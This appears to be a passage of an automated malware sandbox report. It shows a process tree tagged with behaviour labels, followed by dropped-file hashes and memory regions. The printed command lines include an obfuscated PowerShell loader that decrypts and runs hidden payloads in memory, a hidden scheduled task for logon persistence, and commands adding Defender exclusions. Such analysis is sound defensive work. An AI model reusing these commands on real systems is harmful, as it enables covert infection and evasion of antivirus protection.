$e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:436
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_791_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\latencyx791.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:524
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\latencyx791.vbs"
              4⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4400
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\latencyx791.bat" "
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3160
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DK2yqtn/8WWLFGdN0SGSXoqb0xwC458hY3mEb0Z8Op4='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Tn8+JuQ0zcIx9j+6ZeLoqQ=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Roaming\latencyx791.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3124
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath 'C:\'; .('Add-MpP' + 'reference') -ExclusionProcess 'powershell.exe'
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1020
      • C:\Windows\system32\taskkill.exe
        taskkill /IM cmstp.exe /F
        1⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3160

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        9751fcb3d8dc82d33d50eebe53abe314

        SHA1

        7a680212700a5d9f3ca67c81e0e243834387c20c

        SHA256

        ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

        SHA512

        54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        18KB

        MD5

        c610db3e9bb4338000b876e15117f9a9

        SHA1

        5aa3716e022f244af4c571cb7b5f9c00d604acad

        SHA256

        b1130539ce9f0fcfb80494d5b7d49dbeddfba359612730c2eb70509a78c725eb

        SHA512

        2f2c99ee126d6298d424192c5409d972cd89548a15cf503c54f93e882d1e4c5877c7cd633908a34153fb76acb4faab48d12da42442835ad99dc7e1c7d797c23f

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        4abdf5877984973df7031e02dcdaa957

        SHA1

        600bf4203f4cd3201b0595c9bd499d93ea9ebfc4

        SHA256

        098b34ddc05f4a72404180784dad7fda1f2ed00d408bb76f7fa2ac924efd1cbe

        SHA512

        f55b463a89a5b57e68b29c7c343b305fd2221bc07a004a5a85404fe4a5d979c657afcafb8fbfaf477ed434a5703014bc7ca3928794f8bc60e243744dee54265d

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        e9c5f9e7437285aa87e4433bc7e0f9d7

        SHA1

        2363ddac1155a065a54dc6a0fc307d86bd88246b

        SHA256

        0cb341e3c6fd873cf50bd24821761efdaec49406557f21db3f1a4ee68796b520

        SHA512

        7cc866c84540c274e013a0eb453e89a27a52a410923ee28488f9b88d6fd8dad77c6e7e99e1cf97dc6202233a7d093e89bfc22eae3102d50cd83207d98b2f3cb2

      • C:\Users\Admin\AppData\Local\Temp\RES356.tmp

        Filesize

        1KB

        MD5

        d43ebe2048776f4a6866a4b110b53cb4

        SHA1

        685348d94bb4a08fc1eb0e1c277c5a55672fe266

        SHA256

        db0f06f578c0bc7b6ea01cc82cddd4e76c6c78ec2f9943b0a44784edb6434cca

        SHA512

        be8870b0e22e057a7673da1d42ff87fcc61759d03f77386c607ea69a9b10a2ebd7ad61d257962998e322f5554c761a66e617d21314ec1d07df76a9ce3e57ff3f

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tuui40l1.whu.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\mtxs4qav\mtxs4qav.dll

        Filesize

        4KB

        MD5

        22ce8e17e42fd809c859be85e044d053

        SHA1

        a98b143ac3e789c47c690919d144115bd010da37

        SHA256

        45d46cae5352cabcb6401c7fc3d100eaefecff715ecf8d09bd0724edb6304944

        SHA512

        fbfe7656af2ef3278a695c71e5a55cf7bece3ab817a1c8cf7ca4532217834642c87854bd87079729dfb422db5fb248e9ff3c4e2cde5efb314fb40313f5c2024f

      • C:\Users\Admin\AppData\Local\Temp\system.bat

        Filesize

        53KB

        MD5

        eef9239b6e6433e968d7328eb78e5aa4

        SHA1

        00ea660bb2189b9e43a4fa2c7f971bdee84701f3

        SHA256

        15587d9e6274cbe0c11a4f3c45f80d677d76b74840cbe53ee77e6387808e48c2

        SHA512

        8cc45b3dec7c7bf8f4c2f621bfd531a65a6e457f20a5d0bf887afc4eaa6a2364fa59de60ffdf72dc7950b7a7148261783e959d9c3cf28dcc496f1752501d828d

      • C:\Users\Admin\AppData\Roaming\latencyx791.vbs

        Filesize

        111B

        MD5

        020a34e43acfa58665283a10dbcadd38

        SHA1

        5e7d437c353208bc75c80f9672841a8ba171addd

        SHA256

        d484d1089d5eed2ba62da81a835fce4e0bdaabc126a7c35e6bdb0792be522c82

        SHA512

        98a079aaf8967bbbd8eff3cf784110591a2ba6bd9474cafc076fca56f8bf65c44417eee530d5e8671cb8abae1086fddc7568eb6229c39386a44ad8dd104cdd4c

      • C:\windows\temp\oqwqvgfx.inf

        Filesize

        687B

        MD5

        99fdcef63da22bd2d90299ebd3830493

        SHA1

        15c9313961d29d25938a9a1279cd484611c6f4f9

        SHA256

        9872a418ded853162e67f6054b17d6abdcd9f5bdac087d262a5f2604a61e797b

        SHA512

        fb1f13444fd6ae5b692f496481a9601de231ef542ca638c0a21653184fffe5a650c64bea35808d021ec9356808a7f0873a8e908ec2ccdbdc01a321f24e752d66

      • \??\c:\Users\Admin\AppData\Local\Temp\mtxs4qav\CSC14955CEFC1A24FF985C145702B55CC.TMP

        Filesize

        652B

        MD5

        df3c7d3c624158f3c3330107b70b9a73

        SHA1

        dcc1b0297edbb24fb9c5a4adb396787b2a564fb7

        SHA256

        52e01edb9151243a1c0a38ef65894f003f228373b1d1216421beac6023ac66af

        SHA512

        033c6ef3c386f8eb97123fa5e38f193577f1166d6fa43e0b7a69714f02a0d3f70d17b585633996a71f570c2d802234722511041d606d49e2dd8dd555269120ac

      • \??\c:\Users\Admin\AppData\Local\Temp\mtxs4qav\mtxs4qav.0.cs

        Filesize

        2KB

        MD5

        da774b7c7335bf78596f22c13b46a80c

        SHA1

        43d248947111e2d943aa1c77df51fd5192e92797

        SHA256

        da5feb1c361cdfd307e18c753790933d18968da7a5de454a2fae3d9dd5e1fba8

        SHA512

        9c8efab5895c50069512e56b4efc81547f70092064cad8cf526a77f087dace036e876e4da5178d30be213b0c3d9214ef660920c6eff2c7474e5a6d47dfea40d0

      • \??\c:\Users\Admin\AppData\Local\Temp\mtxs4qav\mtxs4qav.cmdline

        Filesize

        369B

        MD5

        ea8728074d73928c716cf80b1b2bd6ce

        SHA1

        27e59a3706b271cd429677a69c6e8f685ed8c806

        SHA256

        9906a2b184d60e6d1294d4d848f2d64be9f73e231ead07c3806b73dc9991607f

        SHA512

        0e3e1c66eb75fbfbb9ea9bf61d2bf7f6242fff90681161b3557e66f59067b71f881c689cd565180431e2eba84c23490eb3013992caf021363b508bed844f3284

      • memory/436-68-0x0000000005DF0000-0x0000000005E56000-memory.dmp

        Filesize

        408KB

      • memory/436-85-0x00000000077F0000-0x000000000788C000-memory.dmp

        Filesize

        624KB

      • memory/436-87-0x0000000008A00000-0x0000000008FA4000-memory.dmp

        Filesize

        5.6MB

      • memory/436-86-0x00000000077E0000-0x00000000077EE000-memory.dmp

        Filesize

        56KB

      • memory/436-84-0x0000000006B20000-0x0000000006B28000-memory.dmp

        Filesize

        32KB

      • memory/436-83-0x0000000006AF0000-0x0000000006B0A000-memory.dmp

        Filesize

        104KB

      • memory/436-64-0x0000000002C20000-0x0000000002C56000-memory.dmp

        Filesize

        216KB

      • memory/436-65-0x00000000057C0000-0x0000000005DE8000-memory.dmp

        Filesize

        6.2MB

      • memory/436-66-0x0000000005680000-0x00000000056A2000-memory.dmp

        Filesize

        136KB

      • memory/436-67-0x0000000005720000-0x0000000005786000-memory.dmp

        Filesize

        408KB

      • memory/436-82-0x0000000007DD0000-0x000000000844A000-memory.dmp

        Filesize

        6.5MB

      • memory/436-78-0x0000000006020000-0x0000000006374000-memory.dmp

        Filesize

        3.3MB

      • memory/436-80-0x0000000006530000-0x000000000654E000-memory.dmp

        Filesize

        120KB

      • memory/436-81-0x00000000065E0000-0x000000000662C000-memory.dmp

        Filesize

        304KB

      • memory/524-110-0x00000000076B0000-0x0000000007753000-memory.dmp

        Filesize

        652KB

      • memory/524-109-0x0000000006A50000-0x0000000006A6E000-memory.dmp

        Filesize

        120KB

      • memory/524-113-0x00000000079C0000-0x00000000079D1000-memory.dmp

        Filesize

        68KB

      • memory/524-112-0x0000000007A40000-0x0000000007AD6000-memory.dmp

        Filesize

        600KB

      • memory/524-99-0x00000000711A0000-0x00000000711EC000-memory.dmp

        Filesize

        304KB

      • memory/524-111-0x0000000007840000-0x000000000784A000-memory.dmp

        Filesize

        40KB

      • memory/524-98-0x0000000007670000-0x00000000076A2000-memory.dmp

        Filesize

        200KB

      • memory/3064-22-0x000001EC6AB60000-0x000001EC6AB7C000-memory.dmp

        Filesize

        112KB

      • memory/3064-35-0x000001EC6AB90000-0x000001EC6AB98000-memory.dmp

        Filesize

        32KB

      • memory/3124-139-0x00000000077C0000-0x0000000007828000-memory.dmp

        Filesize

        416KB

      • memory/3124-134-0x0000000007400000-0x0000000007412000-memory.dmp

        Filesize

        72KB

      • memory/3124-140-0x00000000078F0000-0x000000000790E000-memory.dmp

        Filesize

        120KB

      • memory/3124-141-0x0000000008790000-0x0000000008822000-memory.dmp

        Filesize

        584KB

      • memory/3124-138-0x0000000007840000-0x00000000078B6000-memory.dmp

        Filesize

        472KB

      • memory/3948-52-0x00007FFB253C3000-0x00007FFB253C5000-memory.dmp

        Filesize

        8KB

      • memory/3948-1-0x0000023D68090000-0x0000023D680B2000-memory.dmp

        Filesize

        136KB

      • memory/3948-11-0x00007FFB253C0000-0x00007FFB25E81000-memory.dmp

        Filesize

        10.8MB

      • memory/3948-12-0x00007FFB253C0000-0x00007FFB25E81000-memory.dmp

        Filesize

        10.8MB

      • memory/3948-0-0x00007FFB253C3000-0x00007FFB253C5000-memory.dmp

        Filesize

        8KB

      • memory/3948-53-0x00007FFB253C0000-0x00007FFB25E81000-memory.dmp

        Filesize

        10.8MB

      • memory/3948-59-0x00007FFB253C0000-0x00007FFB25E81000-memory.dmp

        Filesize

        10.8MB